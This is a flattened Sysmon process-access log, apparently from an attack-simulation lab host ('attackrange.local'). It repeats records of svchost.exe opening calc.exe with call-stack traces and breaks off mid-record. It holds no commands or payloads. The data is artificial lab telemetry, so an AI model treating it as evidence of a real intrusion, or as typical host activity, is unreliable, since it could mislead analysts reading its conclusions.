22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360269Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360268Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360267Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360266Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360265Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360264Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360263Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360262Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360261Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.608{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360260Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360259Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360258Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360257Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360256Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360255Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360254Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360253Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360252Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360251Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360250Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360249Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360248Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 